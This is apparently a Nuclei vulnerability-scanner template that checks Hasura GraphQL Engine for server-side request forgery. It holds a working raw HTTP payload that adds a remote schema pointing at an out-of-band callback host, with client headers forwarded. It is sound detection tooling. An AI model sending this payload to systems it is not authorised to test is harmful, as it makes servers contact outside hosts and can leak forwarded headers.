id: hasura-graphql-ssrf
info:
  name: Hasura GraphQL Engine - SSRF Side Request Forgery
  author: princechaddha
  severity: high
  reference: https://cxsecurity.com/issue/WLB-2021040115
  tags: hasura,ssrf

requests:
  - raw:
      - |
        POST /v1/query HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 381
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
        content-type: application/json
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Connection: close

        {
           "type":"bulk",
           "args":[
              {
                 "type":"add_remote_schema",
                 "args":{
                    "name":"test",
                    "definition":{
                       "url":"https://{{interactsh-url}}",
                       "headers":[
                       ],
                       "timeout_seconds":60,
                       "forward_client_headers":true
                    }
                 }
              }
           ]
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 400

      - type: word
        part: interactsh_protocol
        words:
          - "http"